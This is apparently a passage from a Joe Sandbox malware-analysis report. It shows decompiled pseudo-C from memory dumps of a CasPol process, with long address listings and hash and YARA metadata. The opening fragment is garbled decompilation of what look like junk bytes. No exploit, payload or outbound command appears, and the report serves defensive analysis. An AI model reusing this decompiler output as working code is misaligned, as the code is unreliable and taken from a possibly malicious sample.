				asm("rcr byte [0x2ee1e1e1], 0xff");
				asm("adc eax, [0x27d53933]");
				_push(__esp);
				__eflags = __esi -  *0xc7adc627;
				if(__esi <  *0xc7adc627) {
					goto L1;
				}
				__eflags = __esi - 0x1a703472;
				asm("scasb");
				__ebx = __ebx +  *0x52f3898;
				 *0x29d0e361 =  *0x29d0e361 << 0xac;
				__eflags =  *0x29d0e361;
				return __eax;
			}










                                                                        0x00421b68
                                                                        0x00421b68
                                                                        0x00421b68
                                                                        0x00421b68
                                                                        0x00421b68
                                                                        0x00421b6d
                                                                        0x00421b74
                                                                        0x00421b7a
                                                                        0x00421b80
                                                                        0x00421b86
                                                                        0x00421b8c
                                                                        0x00421b92
                                                                        0x00421b9f
                                                                        0x00421ba0
                                                                        0x00421bab
                                                                        0x0042177d
                                                                        0x0042177d
                                                                        0x00421783
                                                                        0x00421789
                                                                        0x004217a2
                                                                        0x004217a5
                                                                        0x004217ab
                                                                        0x004217b2
                                                                        0x004217b8
                                                                        0x004217b9
                                                                        0x004217c5
                                                                        0x004217c8
                                                                        0x004217cf
                                                                        0x004217d6
                                                                        0x004217dc
                                                                        0x004217e9
                                                                        0x004217f9
                                                                        0x004217fa
                                                                        0x004217fb
                                                                        0x00421801
                                                                        0x00421808
                                                                        0x0042180e
                                                                        0x00421814
                                                                        0x00000000
                                                                        0x00421814
                                                                        0x00421bb1
                                                                        0x00421bb7
                                                                        0x00421bbd
                                                                        0x00421bc4
                                                                        0x00421bc5
                                                                        0x00421bcb
                                                                        0x00421bd1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421bd7
                                                                        0x00421bdd
                                                                        0x00421bde
                                                                        0x00421bee
                                                                        0x00421bf5
                                                                        0x00421bfb
                                                                        0x00421c02
                                                                        0x00421c03
                                                                        0x00421c0f
                                                                        0x00421c15
                                                                        0x00421c16
                                                                        0x00421c17
                                                                        0x00421c1d
                                                                        0x00421c24
                                                                        0x00421c2b
                                                                        0x00421c32
                                                                        0x00421c38
                                                                        0x00421c3e
                                                                        0x00421c43
                                                                        0x00421c49
                                                                        0x00421c4a
                                                                        0x00421c4b
                                                                        0x00421c58
                                                                        0x00421c5e
                                                                        0x00421c65
                                                                        0x00421c6b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421c71
                                                                        0x00421c7b
                                                                        0x00421c85
                                                                        0x00421c8b
                                                                        0x00421c97
                                                                        0x00421c9d
                                                                        0x00421ca4
                                                                        0x00421ca4
                                                                        0x00421caf
                                                                        0x00421cb0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421cb6
                                                                        0x00421cbc
                                                                        0x00421cc2
                                                                        0x00421cc8
                                                                        0x00421cce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421cd4
                                                                        0x00421cdb
                                                                        0x00421ce1
                                                                        0x00421ce7
                                                                        0x00421cf0
                                                                        0x00421cf6
                                                                        0x00421d02
                                                                        0x00421d08
                                                                        0x00421d08
                                                                        0x00421d0f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421d15
                                                                        0x00421d1b
                                                                        0x00421d1b
                                                                        0x00421d1c
                                                                        0x00421d1d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421d23
                                                                        0x00421d2f
                                                                        0x00421d35
                                                                        0x00421d36
                                                                        0x00421d3c
                                                                        0x00421d42
                                                                        0x00421d48
                                                                        0x00421d4e
                                                                        0x00421d51
                                                                        0x00421d57
                                                                        0x00421d5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421d60
                                                                        0x00421d60
                                                                        0x00421d66
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421d6c
                                                                        0x00421d72
                                                                        0x00421d78
                                                                        0x00421d7f
                                                                        0x00421d86
                                                                        0x00421d8c
                                                                        0x00421d92
                                                                        0x00421d98
                                                                        0x00421d9e
                                                                        0x00421daa
                                                                        0x00421db1
                                                                        0x00421db8
                                                                        0x00421dbe
                                                                        0x00421dc1
                                                                        0x00421dc7
                                                                        0x00421dcd
                                                                        0x00421dd3
                                                                        0x00421dd6
                                                                        0x00421ddc
                                                                        0x00421de2
                                                                        0x00421de8
                                                                        0x00421dea
                                                                        0x00421df4
                                                                        0x00421dfa
                                                                        0x00421dfa
                                                                        0x00421e00
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421e06
                                                                        0x00421e0c
                                                                        0x00421e12
                                                                        0x00421e12
                                                                        0x00421e12
                                                                        0x00421e18
                                                                        0x00421e1e
                                                                        0x00421e24
                                                                        0x00421e2a
                                                                        0x00421e31
                                                                        0x00421e37
                                                                        0x00421e3d
                                                                        0x00421e40
                                                                        0x00421e47
                                                                        0x00421e4d
                                                                        0x00421e53
                                                                        0x00421e5a
                                                                        0x00421e5d
                                                                        0x00421e5e
                                                                        0x00421e64
                                                                        0x00421e64
                                                                        0x00421e6a
                                                                        0x00421e71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421e77
                                                                        0x00421e7d
                                                                        0x00421e84
                                                                        0x00421e8a
                                                                        0x00421e8d
                                                                        0x00421e93
                                                                        0x00421e9d
                                                                        0x00421e9d
                                                                        0x00421e9e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421ea4
                                                                        0x00421ea4
                                                                        0x00421eaa
                                                                        0x00421eb0
                                                                        0x00421eb0
                                                                        0x00421eb0
                                                                        0x00421eb6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421ebc
                                                                        0x00421ec6
                                                                        0x00421ec7
                                                                        0x00421ecd
                                                                        0x00421ece
                                                                        0x00421eda
                                                                        0x00421ee0
                                                                        0x00421ee7
                                                                        0x00421eea
                                                                        0x00421ef0
                                                                        0x00421ef6
                                                                        0x00421efc
                                                                        0x00421efd
                                                                        0x00421f04
                                                                        0x00421f07
                                                                        0x00421f08
                                                                        0x00421f0e
                                                                        0x00421f15
                                                                        0x00421f16
                                                                        0x00421f1d
                                                                        0x00421f23
                                                                        0x00421f29
                                                                        0x00421f2b
                                                                        0x00421f31
                                                                        0x00421f38
                                                                        0x00421f42
                                                                        0x00421f43
                                                                        0x00421f44
                                                                        0x00421f4a
                                                                        0x00421f50
                                                                        0x00421f57
                                                                        0x00421f5d
                                                                        0x00421f63
                                                                        0x00421f69
                                                                        0x00421f6f
                                                                        0x00421f76
                                                                        0x00421f7c
                                                                        0x00421f7d
                                                                        0x00421f83
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421f89
                                                                        0x00421f8f
                                                                        0x00421f90
                                                                        0x00421f96
                                                                        0x00421f96
                                                                        0x00421f9d

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0ccbbb0ae813c27ea6eb076c657408417a897c76648a9eb78513fc97f73f30d
                                                                        • Instruction ID: 1ff6dee43313cb04a8917b1ecbcd4ff0723e68af32a410c60452719ce5854dd7
                                                                        • Opcode Fuzzy Hash: a0ccbbb0ae813c27ea6eb076c657408417a897c76648a9eb78513fc97f73f30d
                                                                        • Instruction Fuzzy Hash: F7C16572A09791CFE702DF35D88A7513BB1F792324F58428ED8A1631E2D338152ADF89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01481D55 Relevance: .2, Instructions: 226COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E01481D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1491070);
				E0140D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E0148337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E014833B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E013F96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E014833B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E013EE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x14a5880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E013EDFDF(_t91, 1, _t142);
					}
					return E0140D0D1(_t103);
				}
			}





































                                                                        0x01481d55
                                                                        0x01481d55
                                                                        0x01481d57
                                                                        0x01481d5c
                                                                        0x01481d63
                                                                        0x01481d66
                                                                        0x01481d69
                                                                        0x01481d6c
                                                                        0x01481d6e
                                                                        0x01481d71
                                                                        0x01481d74
                                                                        0x01481d77
                                                                        0x01481d7a
                                                                        0x01481d7d
                                                                        0x01481d82
                                                                        0x01481d85
                                                                        0x01481d88
                                                                        0x01481d8d
                                                                        0x01481d90
                                                                        0x01481d94
                                                                        0x01481d96
                                                                        0x01481d98
                                                                        0x01481d98
                                                                        0x01481d9b
                                                                        0x01481d9e
                                                                        0x00000000
                                                                        0x01481da1
                                                                        0x01481da5
                                                                        0x01481e78
                                                                        0x01481e78
                                                                        0x01481e82
                                                                        0x01481e87
                                                                        0x01481e8a
                                                                        0x01481e8d
                                                                        0x01481e92
                                                                        0x01481e95
                                                                        0x01481e98
                                                                        0x01481e9b
                                                                        0x01481ede
                                                                        0x01481ee3
                                                                        0x01481ee8
                                                                        0x01481ef2
                                                                        0x01481ef2
                                                                        0x01481ef5
                                                                        0x01481ef8
                                                                        0x01481efe
                                                                        0x01481f03
                                                                        0x00000000
                                                                        0x01481f09
                                                                        0x01481f0c
                                                                        0x01481f0e
                                                                        0x01481f11
                                                                        0x00000000
                                                                        0x01481f17
                                                                        0x01481f17
                                                                        0x01481f1a
                                                                        0x01481f31
                                                                        0x01481f34
                                                                        0x01481f3f
                                                                        0x01481f42
                                                                        0x01481f45
                                                                        0x01481f47
                                                                        0x01481f4a
                                                                        0x01481f4d
                                                                        0x01481f4f
                                                                        0x01481f63
                                                                        0x01481f65
                                                                        0x01481f67
                                                                        0x00000000
                                                                        0x01481f69
                                                                        0x01481f69
                                                                        0x01481f72
                                                                        0x01481f72
                                                                        0x01481f75
                                                                        0x01481f77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01481f6e
                                                                        0x01481f70
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01481f70
                                                                        0x01481f83
                                                                        0x01481f83
                                                                        0x01481f85
                                                                        0x00000000
                                                                        0x01481f85
                                                                        0x01481f51
                                                                        0x01481f53
                                                                        0x01481f5a
                                                                        0x01481f5c
                                                                        0x01481f87
                                                                        0x01481f87
                                                                        0x01481f87
                                                                        0x01481f8b
                                                                        0x01481f8d
                                                                        0x01481f90
                                                                        0x00000000
                                                                        0x01481f90
                                                                        0x01481f1c
                                                                        0x01481f1c
                                                                        0x00000000
                                                                        0x01481f22
                                                                        0x01481f22
                                                                        0x01481f25
                                                                        0x01481f28
                                                                        0x01481f97
                                                                        0x01481f97
                                                                        0x01481f9d
                                                                        0x01481fa7
                                                                        0x01481faa
                                                                        0x01481fb1
                                                                        0x01481fb9
                                                                        0x01481fbd
                                                                        0x01481fbe
                                                                        0x01481fc0
                                                                        0x01481f2a
                                                                        0x01481f93
                                                                        0x01481f93
                                                                        0x01481f95
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01481f95
                                                                        0x01481f28
                                                                        0x01481f1c
                                                                        0x01481f1a
                                                                        0x01481f11
                                                                        0x01481e9d
                                                                        0x01481ea0
                                                                        0x01481eae
                                                                        0x01481eb4
                                                                        0x01481ebc
                                                                        0x01481ebc
                                                                        0x01481ec2
                                                                        0x01481ec8
                                                                        0x01481ecd
                                                                        0x00000000
                                                                        0x01481ed3
                                                                        0x01481ed3
                                                                        0x00000000
                                                                        0x01481ed3
                                                                        0x01481ecd
                                                                        0x01481dab
                                                                        0x01481dab
                                                                        0x01481db1
                                                                        0x01481db3
                                                                        0x01481db9
                                                                        0x01481dbf
                                                                        0x01481dc2
                                                                        0x01481dda
                                                                        0x01481ddd
                                                                        0x01481de0
                                                                        0x01481de9
                                                                        0x01481dec
                                                                        0x01481def
                                                                        0x01481df1
                                                                        0x01481df3
                                                                        0x01481e0a
                                                                        0x01481e0c
                                                                        0x01481e0e
                                                                        0x00000000
                                                                        0x01481e10
                                                                        0x01481e10
                                                                        0x01481e13
                                                                        0x01481e16
                                                                        0x01481e16
                                                                        0x01481e19
                                                                        0x01481e1c
                                                                        0x01481e1e
                                                                        0x01481e20
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01481e22
                                                                        0x01481e24
                                                                        0x00000000
                                                                        0x01481e26
                                                                        0x00000000
                                                                        0x01481e26
                                                                        0x00000000
                                                                        0x01481e24
                                                                        0x01481e30
                                                                        0x01481e30
                                                                        0x00000000
                                                                        0x01481e30
                                                                        0x01481df5
                                                                        0x01481df7
                                                                        0x01481e01
                                                                        0x01481e32
                                                                        0x01481e34
                                                                        0x01481e36
                                                                        0x00000000
                                                                        0x01481e36
                                                                        0x01481dc4
                                                                        0x01481dc4
                                                                        0x00000000
                                                                        0x01481dc6
                                                                        0x01481dc6
                                                                        0x01481dc9
                                                                        0x01481dcf
                                                                        0x01481dd1
                                                                        0x01481e38
                                                                        0x01481e38
                                                                        0x01481e38
                                                                        0x01481e38
                                                                        0x01481dc4
                                                                        0x01481dbb
                                                                        0x01481dbb
                                                                        0x01481dbb
                                                                        0x01481dbb
                                                                        0x01481e3a
                                                                        0x01481e3a
                                                                        0x01481e3d
                                                                        0x01481e40
                                                                        0x01481e43
                                                                        0x01481e6f
                                                                        0x01481fc7
                                                                        0x01481fc7
                                                                        0x01481e75
                                                                        0x01481e75
                                                                        0x00000000
                                                                        0x01481e75
                                                                        0x01481e6f
                                                                        0x01481fca
                                                                        0x01481fca
                                                                        0x01481fce
                                                                        0x01481fd0
                                                                        0x01481fd0
                                                                        0x01481fd3
                                                                        0x01481fd9
                                                                        0x01481fde
                                                                        0x01481fe4
                                                                        0x01481fe4
                                                                        0x01481fee
                                                                        0x01481fee

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 826d7556b61896f15ea1eb9c5f693fb673791f368c4bb2c7090fd1458338e5f4
                                                                        • Instruction ID: 417216dc726dc781fcd87212b57de96d37123c9dbc405e433d9b02fbc810de83
                                                                        • Opcode Fuzzy Hash: 826d7556b61896f15ea1eb9c5f693fb673791f368c4bb2c7090fd1458338e5f4
                                                                        • Instruction Fuzzy Hash: 65818071E002198FDF18EFA8C4909EDB7B1BF59724B14422BE516EB3E5D7309946CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BC600 Relevance: .2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E013BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x14ad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E013C6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E013FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x14a7b9c; // 0x0
					_t74 = L013D4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E013F9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L013D77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E013FF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E013F13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L013D77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E013F9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                        0x013bc608
                                                                        0x013bc615
                                                                        0x013bc625
                                                                        0x013bc62d
                                                                        0x013bc635
                                                                        0x013bc640
                                                                        0x013bc680
                                                                        0x013bc687
                                                                        0x013bc688
                                                                        0x013bc689
                                                                        0x013bc694
                                                                        0x013bc694
                                                                        0x013bc642
                                                                        0x013bc64a
                                                                        0x013bc697
                                                                        0x01427a25
                                                                        0x01427a2b
                                                                        0x01427a2e
                                                                        0x01427a30
                                                                        0x01427bea
                                                                        0x01427bea
                                                                        0x00000000
                                                                        0x01427bea
                                                                        0x01427a36
                                                                        0x01427a43
                                                                        0x01427a48
                                                                        0x01427a4c
                                                                        0x01427a4e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427a58
                                                                        0x01427a5a
                                                                        0x01427a5b
                                                                        0x01427a5c
                                                                        0x01427a5d
                                                                        0x01427a63
                                                                        0x01427a64
                                                                        0x01427a6a
